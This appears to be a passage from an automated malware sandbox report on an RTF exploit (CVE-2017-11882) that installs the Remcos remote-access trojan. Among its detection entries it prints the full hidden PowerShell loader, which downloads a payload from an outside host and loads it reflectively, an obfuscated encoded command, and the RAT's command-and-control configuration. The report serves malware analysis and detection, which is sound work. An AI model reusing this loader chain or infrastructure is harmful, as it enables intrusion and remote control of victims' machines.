$imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0?
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3420, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" , ProcessId: 3580, ProcessName: wscript.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3420, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3628, TargetFilename: C:\Users\user\AppData\Local\Temp\meo10pqm.2ns.ps1

                Data Obfuscation

                barindex
                Sigma detected: Powershell download and load assembly
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0?

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: 40 37 8B 92 01 93 C4 CC 7F 40 26 DB C8 72 F1 63 F5 5A 9C F3 BE 40 83 FD FC 6D 64 8B 58 AC CF 00 2F DA 1F F9 8C 1A A5 00 2D D9 34 0D FB 2F E7 2F A7 46 E8 A5 28 88 4F E7 A7 62 DC C5 C3 F9 BF E2 D7 88 9A 32 F6 06 34 A1 67 CC C0 00 DC 71 45 21 86 DC 26 61 8E C2 0E 5F 73 FF BE FE 42 35 3C ED 98 5E 41 A0 96 66 64 70 C5 85 1B 14 79 33 53 69 05 8B , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3844, TargetObject: HKEY_CURRENT_USER\Software\Rmc-GT4655\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T14:00:19.277462+020020204231Exploit Kit Activity Detected185.235.137.22380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T14:00:19.277462+020020204251Exploit Kit Activity Detected185.235.137.22380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T14:00:24.455225+020020365941Malware Command and Control Activity Detected192.168.2.2249164192.3.101.2914645TCP
                2024-09-27T14:00:36.906135+020020365941Malware Command and Control Activity Detected192.168.2.2249165192.3.101.2914645TCP
                2024-09-27T14:00:43.549242+020020365941Malware Command and Control Activity Detected192.168.2.2249166192.3.101.2914645TCP
                2024-09-27T14:00:45.972234+020020365941Malware Command and Control Activity Detected192.168.2.2249167192.3.101.2914645TCP
                2024-09-27T14:00:48.920848+020020365941Malware Command and Control Activity Detected192.168.2.2249168192.3.101.2914645TCP
                2024-09-27T14:00:51.366389+020020365941Malware Command and Control Activity Detected192.168.2.2249169192.3.101.2914645TCP
                2024-09-27T14:00:54.908881+020020365941Malware Command and Control Activity Detected192.168.2.2249170192.3.101.2914645TCP
                2024-09-27T14:00:57.365279+020020365941Malware Command and Control Activity Detected192.168.2.2249171192.3.101.2914645TCP
                2024-09-27T14:00:59.806039+020020365941Malware Command and Control Activity Detected192.168.2.2249172192.3.101.2914645TCP
                2024-09-27T14:01:02.280898+020020365941Malware Command and Control Activity Detected192.168.2.2249173192.3.101.2914645TCP
                2024-09-27T14:01:04.729676+020020365941Malware Command and Control Activity Detected192.168.2.2249174192.3.101.2914645TCP
                2024-09-27T14:01:07.191649+020020365941Malware Command and Control Activity Detected192.168.2.2249175192.3.101.2914645TCP
                2024-09-27T14:01:09.705313+020020365941Malware Command and Control Activity Detected192.168.2.2249176192.3.101.2914645TCP
                2024-09-27T14:01:12.307814+020020365941Malware Command and Control Activity Detected192.168.2.2249177192.3.101.2914645TCP
                2024-09-27T14:01:14.815580+020020365941Malware Command and Control Activity Detected192.168.2.2249178192.3.101.2914645TCP
                2024-09-27T14:01:17.339635+020020365941Malware Command and Control Activity Detected192.168.2.2249179192.3.101.2914645TCP
                2024-09-27T14:01:19.774757+020020365941Malware Command and Control Activity Detected192.168.2.2249180192.3.101.2914645TCP
                2024-09-27T14:02:22.430608+020020365941Malware Command and Control Activity Detected192.168.2.2249181192.3.101.2914645TCP
                2024-09-27T14:04:13.637193+020020365941Malware Command and Control Activity Detected192.168.2.2249182192.3.101.2914645TCP
                2024-09-27T14:04:17.612389+020020365941Malware Command and Control Activity Detected192.168.2.2249183192.3.101.2914645TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T14:00:18.336027+020020490381A Network Trojan was detected207.241.227.96443192.168.2.2249162TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Found malware configuration
                Source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfReversingLabs: Detection: 50%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                Source: powershell.exe, 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_308a5491-8

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Found potential equation exploit (CVE-2017-11882)
                Source: Static RTF information: Object: 0 Offset: 0000569Dh
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 185.235.137.223 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.drStream path '_1788929161/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.drStream path '_1788929198/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
